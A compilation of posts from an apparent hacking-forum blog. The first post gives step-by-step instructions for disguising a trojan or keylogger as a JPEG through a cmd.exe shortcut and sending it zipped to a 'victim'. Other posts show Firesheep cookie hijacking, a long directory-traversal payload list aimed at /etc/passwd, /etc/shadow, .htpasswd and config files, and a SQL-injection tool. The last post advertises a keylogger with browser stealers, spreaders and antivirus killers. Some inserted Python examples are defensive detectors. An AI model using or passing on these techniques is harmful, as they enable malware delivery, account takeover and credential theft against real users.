Hide exe into Image






Hide exe Files into Image




This is a good trick to hide your exe files inside a jpg file!
How about sending a trojan or a keylogger to your victim using this trick? Hiding an exe in an image like this is called binding.

This can be done using software and also manually via DOS. So here we are going to do it using DOS.



Do the following steps as explained:

1) Firstly, create a new folder and make sure that the option 'show hidden files and folders' is checked and ‘hide extensions for known file types’ is unchecked. Basically, what you need is to see hidden files and the extensions of all the files on your PC.

2) Paste a copy of your server into the newly created folder. Let's say it's called 'server.exe' (that's why you need file extensions showing, because you need to see the extension to change it).

3) Now you’re going to rename this 'server.exe' to whatever you want, let’s say for example 'picture.jpeg'

4) Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.

5) Now create a shortcut of this 'picture.jpeg' in the same folder.

6) Now that you have a shortcut, rename it to whatever you want, for example, 'me.jpeg'.

7) Go to properties (on file me.jpeg) and now you need to do some changes there.

8) First of all delete all the text on field 'Start In' and leave it empty.

9) Then in the field 'Target' you need to write the path that opens the other file (the server renamed 'picture.jpeg'), so you have to write this: 'C:\WINDOWS\system32\cmd.exe /c picture.jpeg'. Hope every CHC (Chennai Hackers Connect) member understands it.

10) The last field, 'c picture.jpeg' is always the name of the first file. If you called the first file 'soccer.avi' you gotta write 'C:\WINDOWS\system32\cmd.exe /c soccer.avi'.

11) So what you’re doing is when someone clicks on 'me.jpeg', a cmd will execute the other file 'picture.jpeg' and the server will run.

12) On that file 'me.jpeg' (shortcut), go to properties and you have an option to change the icon. Click that and a new window will pop up and you have to write this :- %SystemRoot%\system32\SHELL32.dll . Then press OK.

13) You can set the properties 'Hidden' for the first file 'picture.jpeg' if you think it’s better to get a connection from someone.

14) But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.

15) For me, for example, I always want the shortcut showing first so it can be the first file to be opened. So I rename the server to 'picture2.jpeg' and the shortcut to 'picture1.jpeg'. This way the shortcut will show up first. If you set the hidden property on the server 'picture.jpeg' then you don’t have to bother with this detail, but I’m warning you, the hidden file will always show up inside a Zip or a Rar file.

16) So the best way to send these files together to someone is compress them into Zip or Rar.

17) Inside the Rar or Zip file you can see the files' properties, and even after all this work you can see that the shortcut is recognized as a shortcut, but hopefully the person you sent this to doesn’t know that and is going to open it.
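
From the receiving side, both files in this pair are easy to spot by content rather than by name. The following is an added example, not part of the original post: it flags files with a media extension that start with the 'MZ' executable header, and shortcuts whose visible name ends in a media extension. The sample files are constructed in a temporary folder, and the function names are assumptions of this example.

```python
import os
import tempfile

# Extensions used for the disguise on this page (jpeg, avi) plus close relatives.
MEDIA_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".bmp", ".avi"}
# Every .lnk starts with HeaderSize 0x4C followed by the ShellLink CLSID.
LNK_MAGIC = bytes.fromhex("4c0000000114020000000000c000000000000046")


def classify(path):
    """Return 'pe-as-media', 'lnk-as-media' or None for a single file."""
    stem, ext = os.path.splitext(path)
    ext = ext.lower()
    with open(path, "rb") as fh:
        head = fh.read(len(LNK_MAGIC))
    # Steps 3-4: a renamed executable keeps its 'MZ' DOS header.
    if ext in MEDIA_EXTS and head[:2] == b"MZ":
        return "pe-as-media"
    # Steps 5-6: Explorer never shows '.lnk', so 'me.jpeg.lnk' displays as 'me.jpeg'.
    if ext == ".lnk" and head == LNK_MAGIC:
        if os.path.splitext(stem)[1].lower() in MEDIA_EXTS:
            return "lnk-as-media"
    return None


def scan(root):
    """Walk a directory tree and map relative path -> verdict for suspicious files."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                verdict = classify(full)
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            if verdict:
                findings[os.path.relpath(full, root)] = verdict
    return findings


def demo():
    """Build constructed sample files in a temp folder and scan it."""
    samples = {
        "picture.jpeg": b"MZ\x90\x00" + b"\x00" * 60,       # PE header, image name
        "me.jpeg.lnk": LNK_MAGIC + b"\x00" * 56,            # shortcut, image name
        "holiday.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 60,  # genuine JPEG signature
        "notes.lnk": LNK_MAGIC + b"\x00" * 56,              # ordinary shortcut
    }
    with tempfile.TemporaryDirectory() as folder:
        for name, data in samples.items():
            with open(os.path.join(folder, name), "wb") as fh:
                fh.write(data)
        return scan(folder)


if __name__ == "__main__":
    for path, verdict in sorted(demo().items()):
        print(f"{verdict:13} {path}")
```

The same check works on the members of a Zip or Rar attachment once they are extracted to a quarantine folder.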



Pangolin Automated SQL injection

Automated SQL injection with pangolin- Tutorial+Application




Pangolin is an automatic SQL injection penetration testing (Pen-testing) tool for Website manager or IT Security analyst. Its goal is to detect and take advantage of SQL injection vulnerabilities on web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or users specific DBMS tables/columns, run his own SQL statement, read specific files on the file system and more.



Test many types of databases

Your web applications using Access, DB2, Informix, Microsoft SQL Server 2000, Microsoft SQL Server 2005, Microsoft SQL Server 2008, MySQL, Oracle, PostgreSQL, Sqlite3, Sybase.

Pangolin supports all of them.

Features: Auto-analyzing keyword, HTTPS support, Pre-Login, Bypass firewall setting, Injection Digger, Data dumper, etc.



Use internet without browser


Surf on the internet without Browser




Hello CHC (Chennai Hackers Members), you can now surf the internet without any actual browser. Have you ever found yourself sitting in front of a computer where Internet Explorer or Firefox was blocked and you were restricted from installing any software? If that PC is running Windows XP, then there is a chance for you to still surf the Internet. Just follow this:
Open Calculator: Start> Program Files> Accessories> Calculator, or press Windows+R, type ‘calc’ in the Run box and click OK. In Calculator, go to Help> Help Topics. Right click on the left hand side of the title bar and click on ‘Jump to URL’.
Type in the URL and make sure to include the ‘http://’ at the beginning.

Basically what you are looking at is Internet Explorer 6 inside a help window, but this version of the program isn’t quite smart. This was tested on Windows XP SP2 with Internet Explorer 6 and I’m not sure whether it will work on a computer with Internet Explorer 7 installed.

Feel free to comment 

Enjoy.

CRACK THE HASH CHALLENGE

FIND THE HASH AND CRACK


Hello CHC (Chennai Hacker Connect) members. As the previous challenge was our first one, we made it simple and many of you cracked it successfully. But this challenge is going to be a bit more difficult than the previous one.


The names and IDs of the top five crackers will be displayed on the CHC (Chennai Hacker Connect) FB page.


Note: Don't forget to comment your answer with your FB id or mail id.







CRACK THE HASH:

c132d0663ed992e42fa61328eac71aeef47330c0






HACK PASSWORD USING HTTP SESSION HIJACKING


HACK PASSWORD'S USING HTTP SESSION HIJACKING (Cookie Stealing)



Hi CHC (Chennai Hackers Connect) members, sorry for no posts for a long time. We are quite busy developing a hacking tool. This method is a bit less known, but in recent months it has become widely popular due to the introduction of the software 'FIRESHEEP'. When you log in to your account at a website, your web browser sends your username and password to the website's server. The password is first encrypted and then sent over the network. The server then checks the username and password against its database, and if they both match it sends the user's browser a "cookie" (a piece of text which the browser uses for further requests to the web server). Unlike the password, the cookies are not encrypted and are sent as they are over the network, so these cookies can easily be captured as they travel through the network or a busy Wi-Fi. The newly released Firefox extension "FIRESHEEP" makes it even easier. Actually so easy that even a total newbie can capture these cookies.


FIRESHEEP TUTORIAL (Http Session Hijacking)

Firesheep, a Firefox addon, has recently become very popular for easily carrying out an HTTP session hijacking attack. An HTTP session hijacking attack can't be considered a very sophisticated attack, but it needs some technical knowledge to perform. Firesheep, however, makes the attack child's play. Firesheep was developed by Eric Butler for Firefox; it was released at Toorcon 12 to demonstrate how serious cookie stealing can be.
Now let's understand how Firesheep actually works. When you provide your username and password in the login form of a website and submit it, the browser first encrypts the password and then sends it over the network. The website compares the information against its internal database and, if they match, it sends a cookie (a small text file) to your browser. The browser saves this cookie and uses it to authenticate the user on the website every time the user opens a different page of the website. When the user logs out of his account the browser just deletes the cookie. Now the problem is that these cookies are not encrypted before being sent over the network; because of this, a hacker can capture these cookies and use them to authenticate himself as the user from whom the cookie was stolen.
Now let's see how to use Firesheep.

Step 1
First download and install WinPcap (WinPcap is used on Windows for capturing network traffic). On Unix-like systems you can use pcap from the libpcap library.

Step 2
Download Firesheep and open it in Firefox, which will install it automatically. Or just drag it and drop it onto the Firefox shortcut (Firesheep does not support Firefox 4 at this time).

Step 3
After it is installed, in Firefox go to View --> Sidebar --> Firesheep. A sidebar will appear in the browser with a button "start capturing"; press it and sit back. In a few seconds you will see account details with photos of the target. Click on one of them and you will directly enter his account. Simple as that.
(Note: Using Firesheep to hijack others' accounts is illegal under the wiretapping Act.)

PERSONAL NOTE: The addon Firesheep had become very popular recently, so the software Blacksheep was developed, which stops Firesheep.
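
The weakness described above is a session cookie that the browser is willing to send over plain HTTP. As an added example (not from the original post), the following audits a login response for exactly that: cookies without the Secure attribute, cookies issued over HTTP, and a missing Strict-Transport-Security header. The response, host name and cookie values are constructed, and the function names are assumptions of this example.

```python
# Constructed sample: response to a login POST, as a site of the Firesheep era
# might have sent it. Host name and cookie values are made up.
SAMPLE_RESPONSE = """\
HTTP/1.1 302 Found
Location: http://example.test/home
Set-Cookie: session_id=3f9a1c; Path=/
Set-Cookie: csrf=77aa; Path=/; Secure; HttpOnly
Set-Cookie: prefs=dark; Path=/; secure
"""


def parse_headers(raw):
    """Return a list of (lower-cased name, value) pairs from a raw header block."""
    pairs = []
    for line in raw.splitlines()[1:]:          # skip the status line
        if not line.strip():
            break                              # blank line ends the headers
        name, _, value = line.partition(":")
        pairs.append((name.strip().lower(), value.strip()))
    return pairs


def parse_set_cookie(value):
    """Split one Set-Cookie value into (cookie name, {attribute: value})."""
    first, *rest = [part.strip() for part in value.split(";")]
    attrs = {}
    for part in rest:
        if part:
            key, _, val = part.partition("=")
            attrs[key.strip().lower()] = val.strip()
    return first.partition("=")[0].strip(), attrs


def audit(raw, scheme):
    """Report cookies a passive listener could capture, plus HSTS status."""
    headers = parse_headers(raw)
    report = {"hsts": any(n == "strict-transport-security" for n, _ in headers),
              "cookies": {}}
    for name, value in headers:
        if name != "set-cookie":
            continue
        cookie, attrs = parse_set_cookie(value)
        problems = []
        if scheme != "https":
            problems.append("set-over-http")      # visible the moment it is issued
        if "secure" not in attrs:
            problems.append("missing-secure")     # browser replays it over http://
        if "httponly" not in attrs:
            problems.append("missing-httponly")   # readable by page scripts
        if problems:
            report["cookies"][cookie] = problems
    return report


if __name__ == "__main__":
    result = audit(SAMPLE_RESPONSE, "https")
    print("HSTS present:", result["hsts"])
    for cookie, problems in result["cookies"].items():
        print(cookie, "->", ", ".join(problems))
```

A session cookie reported as missing-secure on a site without HSTS is the case Firesheep demonstrated: the login is protected, the cookie that follows it is not.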



Directory Traversal Cheat Sheet


Cheat Sheet for Directory Traversal Attack







    ____ _                            _   _   _            _                 
   / ___| |__   ___ _ __  _ __   __ _(_) | | | | __ _  ___| | _____ _ __ ___ 
  | |   | '_ \ / _ \ '_ \| '_ \ / _` | | | |_| |/ _` |/ __| |/ / _ \ '__/ __|
  | |___| | | |  __/ | | | | | | (_| | | |  _  | (_| | (__|   <  __/ |  \__ \
   \____|_| |_|\___|_| |_|_| |_|\__,_|_| |_| |_|\__,_|\___|_|\_\___|_|  |___/




/etc/master.passwd
/master.passwd
etc/passwd
etc/shadow
/etc/passwd
/etc/passwd
../etc/passwd
../etc/passwd
../../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/shadow
———————————————————————————————————————————-
../../../../../../etc/passwd&=%3C%3C%3C%3C
../../../administrator/inbox
../../../../../../../dev
———————————————————————————————————————————-
.htpasswd
passwd
passwd.dat
pass.dat
.htpasswd
/.htpasswd
../.htpasswd
.passwd
/.passwd
../.passwd
.pass
../.pass
members/.htpasswd
member/.htpasswd
user/.htpasswd
users/.htpasswd
root/.htpasswd
———————————————————————————————————————————-
db.php
data.php
database.asp
database.js
database.php
dbase.php a
admin/access_log
../users.db.php
users.db.php
———————————————————————————————————————————-
/core/config.php
config.php
config.js
../config.js
config.asp
../config.asp
_config.php
../_config.php
../_config.php
../config.php
config.inc.php
../config.inc.php
/config.asp
../config.asp
/../../../../pswd
/admin/install.php
../install.php
install.php
———————————————————————————————————————————-
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow
..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd
..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow
..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
———————————————————————————————————————————-
/..\..\..\..\..\..\winnt\win.ini
../../windows/win.ini
..//..//..//..//..//boot.ini
..\../..\../boot.ini
..\../..\../..\../..\../boot.ini
\…..\\\…..\\\…..\\\
=3D “/..” . “%2f..
d:\AppServ\MySQL
c:\AppServ\MySQL
c:WINDOWS/system32/
/C:\Program Files\
/D:\Program Files\
/C:/inetpub/ftproot/
———————————————————————————————————————————-
/boot/grub/grub.conf
/proc/interrupts
/proc/cpuinfo
/proc/meminfo
———————————————————————————————————————————-
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_log
../../../../../../../usr/local/apache/logs/access.log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_log
../../../../../../../usr/local/apache/logs/error.log
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
———————————————————————————————————————————-
/etc/init.d/apache
/etc/init.d/apache2
/etc/httpd/httpd.conf
/etc/apache/apache.conf
/etc/apache/httpd.conf
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/opt/apache/conf/httpd.conf
/home/apache/httpd.conf
/home/apache/conf/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/default_vhost.include
———————————————————————————————————————————-
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
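
Every entry in this list relies on the application joining a user-supplied name onto a directory without checking where the result lands. As an added example (not part of the original cheat sheet), the following is a server-side guard that decodes the request value until it is stable, rejects invalid UTF-8 such as the %c0%ae form, treats backslashes as separators, and then verifies that the normalised path is still inside the base directory. The base directory, function names and the two benign paths are assumptions of this example; the other sample inputs are copied from the list above.

```python
import posixpath
from urllib.parse import unquote_to_bytes

BASE = "/var/www/files"  # assumed document directory for this example


def decode_fully(value, max_rounds=3):
    """Percent-decode until stable so %2F and nested encodings are seen as '/'."""
    for _ in range(max_rounds):
        try:
            decoded = unquote_to_bytes(value).decode("utf-8")  # strict decoding
        except UnicodeDecodeError:
            # %c0%ae is an overlong encoding of '.', which is not valid UTF-8.
            raise ValueError("invalid UTF-8") from None
        if decoded == value:
            return decoded
        value = decoded
    raise ValueError("too many encoding layers")


def resolve_under(base, user_path):
    """Return the normalised path inside base, or raise ValueError."""
    path = decode_fully(user_path).replace("\\", "/")  # treat '\' as a separator
    if "\x00" in path or ":" in path:
        raise ValueError("NUL byte or drive letter")
    # An absolute user path replaces base in join(); commonpath then rejects it.
    candidate = posixpath.normpath(posixpath.join(base, path))
    if posixpath.commonpath([base, candidate]) != base:
        raise ValueError("escapes base directory")
    return candidate


def verdicts(paths, base=BASE):
    """Map each requested path to its resolved location or 'blocked: reason'."""
    out = {}
    for p in paths:
        try:
            out[p] = resolve_under(base, p)
        except ValueError as exc:
            out[p] = f"blocked: {exc}"
    return out


SAMPLES = [
    "images/logo.png",                 # constructed benign request
    "docs/../images/logo.png",         # constructed: '..' that stays inside base
    "/etc/passwd",
    "../../etc/passwd",
    "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
    "..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini",
    "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd",
    "..\\../..\\../boot.ini",
    "c:WINDOWS/system32/",
]

if __name__ == "__main__":
    for request, result in verdicts(SAMPLES).items():
        print(f"{request!r:75} {result}")
```

This check is purely lexical; on a real filesystem, resolve symbolic links as well (for example with os.path.realpath) before comparing against the base directory.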

Backtrack kernel sources


Prepare Backtrack kernel sources






Some drivers and programs in Backtrack require kernel headers, for example wireless drivers and VMware Tools.
CHC members, this is the easy way of compiling the Backtrack kernel:


root@bt:~# prepare-kernel-sources
root@bt:~# cd /usr/src/linux
root@bt:/usr/src/linux# cp -rf include/generated/* include/linux/



NetBIOS Scanning


Scanning NetBIOS using nbtscan and Metasploit

Hello CHC members. During a penetration testing engagement we might come across the NetBIOS service. In the past the NetBIOS protocol was enabled in almost every network that was running Windows. Nowadays system administrators are disabling this service because plenty of information can be unveiled regarding shares, users and domain controllers. However, NetBIOS can still be found on default configurations of Windows Server 2008 and Windows Vista, so in a penetration test this protocol can be abused if we discover it.
Generally the NetBIOS provides the following three services:
  • Name Service: UDP/137
  • Datagram Service: UDP/138
  • Session Service: TCP/139
On systems that have this service enabled we can use some tools to discover information about hostnames and domains, especially in Windows networks. In some cases this protocol can also be found on Linux systems.
The two basic tools are nbtstat and nbtscan. nbtstat is a command line utility that is integrated in Windows systems; it can unveil information about the NetBIOS names and the name table of the local or a remote machine, but only for one host. nbtscan, on the other hand, is a NetBIOS nameserver scanner which has the same functions as nbtstat but operates on a range of addresses instead of one.
The next image shows the usage of nbtstat:
   nbtstat usage
The numeric values are called suffixes. For example, the <01> and <1D> suffixes indicate the Master Browser, <20> that the machine is running the File Server service, <03> that a messenger service is running and <00> that a workstation service is running as well. <1E> is the Browser Service Elections.
nbtscan is installed by default on Backtrack, but there is a version for Windows platforms as well. We can use nbtscan to scan the whole network. As we can see from the next image, we have discovered the IP addresses, the NetBIOS names, the users that are logged in and the MAC addresses of the hosts that are running the NetBIOS service on the network.
   nbtscan

We can also use the -v option to produce verbose output.
  nbtscan – verbose output

With the verbose option the output format is similar to nbtstat. Again, <01> indicates the Master Browser service, <00> the workstation, <20> the File Server service and <1e> and <1d> the Browser Service Elections and the Master Browser. We can also see that the domain this workstation belongs to is London.
As an alternative we can use the Metasploit module smb_version, which will unveil additional information such as the operating system name and version, the service pack level, the language, and the system and domain name.
Metasploit smb_version module

Conclusion
As we saw in this article, from systems that had the NetBIOS service enabled we managed to discover plenty of information, including domain names, users, operating system versions, MAC addresses and more. If this service is found enabled, it can be used in the information gathering stage of a penetration test. So from a security point of view it is recommended that this service be disabled.

Unknow Keylogger v1.4 (Tool+Source Code)


  
Unknow Keylogger v1.4









Features:

1- Built in Stub 2- Get Tons of Information about the Victim (Computer User, Computer Name, Computer Total Physical Memory, Victim's IP Address, Victim's Country, Date, etc...) 3- Send logs to SMTP Servers and FTP 4- SMTP (Hotmail, Gmail, AOL, Yahoo) 5- Test Mail Functionality (Hotmail, Gmail, AOL, Yahoo) 6- Test FTP Functionality 7- Continuously Send Logs without Fail 8- Custom Logs Sending Interval (Which means you Choose when the Logs are sent to you) 9- Logs Every Single Thing on the Keyboard (Letters (Upper Case and Lower Case) - Numbers - Symbols - Specific Keys ([F1], [F2], [Home], etc...)) 10- Works on all Operating Systems (Windows XP, Windows Vista, Windows 7 (32 and 64 bit)) 11- Hide Functionality (Make the Server Invisible to the Naked eye) 12- Never Crashes in Victim's Computer (Will always be working whatever happens) 13- Simple and Easy to use GUI 14- Customer Server Name 15- Sends Clean and Very Organized Logs 16- Can be Used as a Keylogger - Stealer - Worm - Spreader and more by just Checking Few Boxes


Spreaders:
1- USB Spreader 2- LAN Spreader 3- P2P Spreader 4- RAR Spreader


Stealers:
1- Firefox 4/5/6/7/8/9 2- Google Chrome All Versions 3- Opera All Versions 4- Internet Explorer 7/9 5- Steam Stealer 6- CD Keys (up to 300)


Anti Killers:
1- Anti Nod32 (All Versions) 2- Anti Kaspersky (All Versions) 3- Anti BitDefender (All Versions) 4- Anti MalwareBytes (All Versions) 5- Anti Norman (All Versions) 6- Anti WireShark (All Versions) 7- Anti Anubis (All Versions) 8- Anti KeyScrambler (All Versions) 9- Anti Ollydbg (All Versions) 10- Anti Outpost (All Versions) 11- Anti ZoneAlarm (All Versions)


Disablers:
1- Disable RUN 2- Disable Registry 3- Disable CMD 4- Disable Right Click 5- Disable Task Manager 6- Disable System Restore


Deleters:
1- Delete FireFox Cookies 2- Delete Google Chrome Cookies 3- Delete Internet Explorer Cookies


Download And Execute Add any Link that Leads to any kind of File and this File will be Downloaded and Execute Automatically and Anonymously 

Wpge Loader: Add any Link and it will be Automatically Loaded on the Victim's PC


Fake Message: Write any kind of Message and you can choose Any kinds of Types for it and it will Automatically Appear on the Victim's Computer


Built Ins 1- Icon Changer 2- File Pumper (the Server size will never change even if the Server was Zipped or Extracted)






